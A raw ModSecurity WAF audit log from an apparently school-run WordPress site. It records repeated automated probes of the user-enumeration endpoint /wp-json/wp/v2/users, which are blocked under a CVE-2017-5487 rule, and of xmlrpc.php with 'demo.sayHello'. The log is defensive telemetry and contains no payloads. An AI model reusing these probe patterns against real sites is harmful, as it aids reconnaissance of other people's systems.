"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805101426961 2130 (- - -) Stopwatch2: 1746805101426961 2130; combined=1064, p1=355, p2=683, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --decf996c-Z-- --1dbef81b-A-- [09/May/2025:22:38:28 +0700] aB4hdC-fAO47ojYKsMr5-QAAAEI 103.236.140.4 56864 103.236.140.4 8181 --1dbef81b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.205 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1dbef81b-C-- demo.sayHello --1dbef81b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dbef81b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805108127389 4654 (- - -) Stopwatch2: 1746805108127389 4654; combined=3656, p1=428, p2=3026, p3=27, p4=26, p5=87, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dbef81b-Z-- --bd421a57-A-- [09/May/2025:22:38:37 +0700] aB4hfVoC-7ITMWTA_c9ebQAAANU 103.236.140.4 56868 103.236.140.4 8181 --bd421a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd421a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd421a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805117978094 2887 (- - -) Stopwatch2: 1746805117978094 2887; combined=1311, p1=451, p2=832, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd421a57-Z-- --7444fd20-A-- [09/May/2025:22:38:40 +0700] aB4hgB6q_ZMebht3q14k8wAAAIQ 103.236.140.4 56870 103.236.140.4 8181 --7444fd20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7444fd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7444fd20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805120937300 2564 (- - -) Stopwatch2: 1746805120937300 2564; combined=1148, p1=364, p2=752, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7444fd20-Z-- --4841e571-A-- [09/May/2025:22:38:45 +0700] aB4hhVoC-7ITMWTA_c9ecAAAAME 103.236.140.4 56880 103.236.140.4 8181 --4841e571-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4841e571-C-- demo.sayHello --4841e571-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4841e571-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805125703913 5980 (- - -) Stopwatch2: 1746805125703913 5980; combined=4368, p1=617, p2=3522, p3=33, p4=35, p5=96, sr=110, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4841e571-Z-- --7b85ed35-A-- [09/May/2025:22:38:46 +0700] aB4hhh6q_ZMebht3q14k9AAAAJI 103.236.140.4 56884 103.236.140.4 8181 --7b85ed35-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7b85ed35-C-- demo.sayHello --7b85ed35-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b85ed35-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805126676001 4602 (- - -) Stopwatch2: 1746805126676001 4602; combined=3699, p1=466, p2=2931, p3=21, p4=23, p5=142, sr=70, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b85ed35-Z-- --0244640d-A-- [09/May/2025:22:39:04 +0700] aB4hmB6q_ZMebht3q14k9gAAAIg 103.236.140.4 56904 103.236.140.4 8181 --0244640d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0244640d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0244640d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805144712263 3202 (- - -) Stopwatch2: 1746805144712263 3202; combined=1392, p1=468, p2=893, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0244640d-Z-- --410e2a4f-A-- [09/May/2025:22:39:13 +0700] aB4hoVoC-7ITMWTA_c9eegAAANc 103.236.140.4 56910 103.236.140.4 8181 --410e2a4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --410e2a4f-C-- demo.sayHello --410e2a4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --410e2a4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805153112735 6002 (- - -) Stopwatch2: 1746805153112735 6002; combined=4336, p1=626, p2=3477, p3=33, p4=36, p5=99, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --410e2a4f-Z-- --cdad5c24-A-- [09/May/2025:22:39:13 +0700] aB4hoVoC-7ITMWTA_c9eewAAAMA 103.236.140.4 56912 103.236.140.4 8181 --cdad5c24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cdad5c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdad5c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805153452103 2156 (- - -) Stopwatch2: 1746805153452103 2156; combined=1050, p1=351, p2=675, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdad5c24-Z-- --6172dc12-A-- [09/May/2025:22:39:19 +0700] aB4hp1oC-7ITMWTA_c9efgAAAMY 103.236.140.4 56918 103.236.140.4 8181 --6172dc12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6172dc12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6172dc12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805159609324 2020 (- - -) Stopwatch2: 1746805159609324 2020; combined=952, p1=326, p2=600, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6172dc12-Z-- --bde6a804-A-- [09/May/2025:22:39:20 +0700] aB4hqFoC-7ITMWTA_c9efwAAAMk 103.236.140.4 56920 103.236.140.4 8181 --bde6a804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bde6a804-C-- demo.sayHello --bde6a804-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bde6a804-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805160620861 4761 (- - -) Stopwatch2: 1746805160620861 4761; combined=3892, p1=437, p2=3119, p3=22, p4=24, p5=158, sr=69, sw=132, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bde6a804-Z-- --76aba72a-A-- [09/May/2025:22:39:26 +0700] aB4hrloC-7ITMWTA_c9egwAAAMQ 103.236.140.4 56928 103.236.140.4 8181 --76aba72a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76aba72a-C-- demo.sayHello --76aba72a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76aba72a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805166992782 5917 (- - -) Stopwatch2: 1746805166992782 5917; combined=4324, p1=599, p2=3480, p3=33, p4=42, p5=100, sr=82, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76aba72a-Z-- --de02fa59-A-- [09/May/2025:22:39:36 +0700] aB4huC-fAO47ojYKsMr5_QAAAEk 103.236.140.4 56932 103.236.140.4 8181 --de02fa59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --de02fa59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de02fa59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805176011317 2917 (- - -) Stopwatch2: 1746805176011317 2917; combined=1265, p1=434, p2=801, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de02fa59-Z-- --f2b86c3e-A-- [09/May/2025:22:39:41 +0700] aB4hvVoC-7ITMWTA_c9ehgAAAM4 103.236.140.4 56940 103.236.140.4 8181 --f2b86c3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2b86c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2b86c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805181674376 2231 (- - -) Stopwatch2: 1746805181674376 2231; combined=982, p1=319, p2=637, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2b86c3e-Z-- --8e8b5c42-A-- [09/May/2025:22:39:45 +0700] aB4hwVoC-7ITMWTA_c9eiQAAANQ 103.236.140.4 56946 103.236.140.4 8181 --8e8b5c42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e8b5c42-C-- demo.sayHello --8e8b5c42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8b5c42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805185083313 4593 (- - -) Stopwatch2: 1746805185083313 4593; combined=3598, p1=416, p2=2987, p3=21, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8b5c42-Z-- --7c9b7b79-A-- [09/May/2025:22:39:46 +0700] aB4hwloC-7ITMWTA_c9eigAAAM0 103.236.140.4 56948 103.236.140.4 8181 --7c9b7b79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c9b7b79-C-- demo.sayHello --7c9b7b79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9b7b79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805186664286 6613 (- - -) Stopwatch2: 1746805186664286 6613; combined=4784, p1=608, p2=3931, p3=42, p4=41, p5=96, sr=89, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9b7b79-Z-- --d92e4a6f-A-- [09/May/2025:22:40:43 +0700] aB4h-1oC-7ITMWTA_c9ejgAAAMY 103.236.140.4 56956 103.236.140.4 8181 --d92e4a6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d92e4a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d92e4a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805243202988 2921 (- - -) Stopwatch2: 1746805243202988 2921; combined=1304, p1=466, p2=808, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
